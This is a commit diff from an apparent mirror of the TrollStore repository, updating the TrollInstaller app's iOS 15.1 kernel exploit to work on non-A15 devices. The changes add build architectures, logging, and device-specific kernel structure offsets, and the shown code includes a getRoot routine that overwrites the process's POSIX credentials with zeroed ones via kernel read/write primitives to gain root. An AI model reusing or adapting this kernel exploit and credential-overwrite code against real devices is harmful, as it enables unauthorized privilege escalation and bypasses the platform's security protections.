bughz/TrollStore
1
0
Fork 0
mirror of https://github.com/opa334/TrollStore.git synced 2025-11-04 15:42:35 +08:00
Code Issues Projects Releases Wiki Activity

Hopefully fix TrollInstaller not working on non-A15 devices (quietly updated release so redownload IPA)

Browse Source
This commit is contained in:
opa334 2022-09-02 21:55:39 +02:00
parent c118d1eb33
commit e4afe70414
3 changed files with 51 additions and 5 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

8
Installer/TrollInstaller/TrollInstaller.xcodeproj/project.pbxproj
View File

@ -388,6 +388,10 @@
8CE2BD3A28AD5D730058FBAD /* Debug */ = { 8CE2BD3A28AD5D730058FBAD /* Debug */ = {
isa = XCBuildConfiguration; isa = XCBuildConfiguration;
buildSettings = { buildSettings = {
ARCHS = (
arm64e,
arm64,
);
ASSETCATALOG_COMPILER_APPICON_NAME = AppIcon; ASSETCATALOG_COMPILER_APPICON_NAME = AppIcon;
ASSETCATALOG_COMPILER_GLOBAL_ACCENT_COLOR_NAME = AccentColor; ASSETCATALOG_COMPILER_GLOBAL_ACCENT_COLOR_NAME = AccentColor;
CODE_SIGN_STYLE = Automatic; CODE_SIGN_STYLE = Automatic;
@ -421,6 +425,10 @@
8CE2BD3B28AD5D730058FBAD /* Release */ = { 8CE2BD3B28AD5D730058FBAD /* Release */ = {
isa = XCBuildConfiguration; isa = XCBuildConfiguration;
buildSettings = { buildSettings = {
ARCHS = (
arm64e,
arm64,
);
ASSETCATALOG_COMPILER_APPICON_NAME = AppIcon; ASSETCATALOG_COMPILER_APPICON_NAME = AppIcon;
ASSETCATALOG_COMPILER_GLOBAL_ACCENT_COLOR_NAME = AccentColor; ASSETCATALOG_COMPILER_GLOBAL_ACCENT_COLOR_NAME = AccentColor;
CODE_SIGN_STYLE = Automatic; CODE_SIGN_STYLE = Automatic;

25
Installer/TrollInstaller/TrollInstaller/ViewController.m
View File

@ -16,6 +16,17 @@
extern uint64_t g_self_proc; extern uint64_t g_self_proc;
void badLog(const char* a, ...)
{
va_list va;
va_start(va, a);
NSString* af = [NSString stringWithUTF8String:a];
NSString* msg = [[NSString alloc] initWithFormat:af arguments:va];
va_end(va);
NSLog(@"%@",msg);
return;
}
int runBinary(NSString* path, NSArray* args) int runBinary(NSString* path, NSArray* args)
{ {
NSMutableArray* argsM = args.mutableCopy; NSMutableArray* argsM = args.mutableCopy;
@ -63,7 +74,7 @@ gid_t backup_groupList[200];
int getRoot(void) int getRoot(void)
{ {
printf("attempting to get root...\n"); NSLog(@"attempting to get root...\n");
usleep(1000); usleep(1000);
backup_groupSize = getgroups(200, &backup_groupList[0]); backup_groupSize = getgroups(200, &backup_groupList[0]);
@ -71,19 +82,19 @@ int getRoot(void)
backup_cred = proc_get_posix_cred(g_self_proc); backup_cred = proc_get_posix_cred(g_self_proc);
struct k_posix_cred zero_cred = {0}; struct k_posix_cred zero_cred = {0};
printf("setting posix cred to zero cred...\n"); NSLog(@"setting posix cred to zero cred...\n");
usleep(1000); usleep(1000);
proc_set_posix_cred(g_self_proc, zero_cred); proc_set_posix_cred(g_self_proc, zero_cred);
int err = setgroups(0,0); int err = setgroups(0,0);
if(err) if(err)
{ {
printf("setgroups error %d\n", err); NSLog(@"setgroups error %d\n", err);
usleep(1000); usleep(1000);
} }
int uid = getuid(); int uid = getuid();
printf("getuid => %d\n", uid); NSLog(@"getuid => %d\n", uid);
usleep(1000); usleep(1000);
return uid; return uid;
@ -135,6 +146,9 @@ int writeRemountPrivatePreboot(void)
- (void)doInstallation - (void)doInstallation
{ {
NSLog(@"TrollStore out here, exploitation starting!");
usleep(1000);
[self updateStatus:@"Exploiting..."]; [self updateStatus:@"Exploiting..."];
// Run Kernel exploit // Run Kernel exploit
@ -151,6 +165,9 @@ int writeRemountPrivatePreboot(void)
km.kwrite_64 = kwrite64; km.kwrite_64 = kwrite64;
km.kcleanup = exploitation_cleanup; km.kcleanup = exploitation_cleanup;
NSLog(@"Exploitation finished, post exploit stuff next!");
usleep(1000);
[self updateStatus:@"Getting root..."]; [self updateStatus:@"Getting root..."];
// Get root // Get root

23
Installer/TrollInstaller/TrollInstaller/exploit/kernel_base.c
View File

@ -9,6 +9,9 @@
#include <stdint.h> #include <stdint.h>
#include <sys/socket.h> #include <sys/socket.h>
#include <sys/syscall.h> #include <sys/syscall.h>
#include <sys/utsname.h>
extern void badLog(const char*, ...);
uint64_t g_self_proc = 0; uint64_t g_self_proc = 0;
@ -46,7 +49,25 @@ uint64_t kernel_base_from_holder(mach_port_t holder, uint64_t holder_addr)
uint64_t x68 = xpaci(kread64(kmsg + 0x68)); uint64_t x68 = xpaci(kread64(kmsg + 0x68));
uint64_t self_ipc_space = xpaci(kread64(x68 + 0x50)); uint64_t self_ipc_space = xpaci(kread64(x68 + 0x50));
uint64_t self_task = xpaci(kread64(self_ipc_space + 0x30)); uint64_t self_task = xpaci(kread64(self_ipc_space + 0x30));
g_self_proc = xpaci(kread64(self_task + 0x3c8));
struct utsname u;
uname(&u);
uint64_t off_task_bsd_info;
#if __arm64e__
if (strstr(u.machine, "iPhone14,"))
{
off_task_bsd_info = 0x3c8; // ios15.1 a15 // proc_t::task_bsd_info
}
else
{
off_task_bsd_info = 0x3b8; //; iOS15.1 a12 // proc_t::task_bsd_info
}
#else
off_task_bsd_info = 0x3A0;
#endif
g_self_proc = xpaci(kread64(self_task + off_task_bsd_info));
// find kernel base // find kernel base
uint64_t pos = (fops & ~0x3FFF); uint64_t pos = (fops & ~0x3FFF);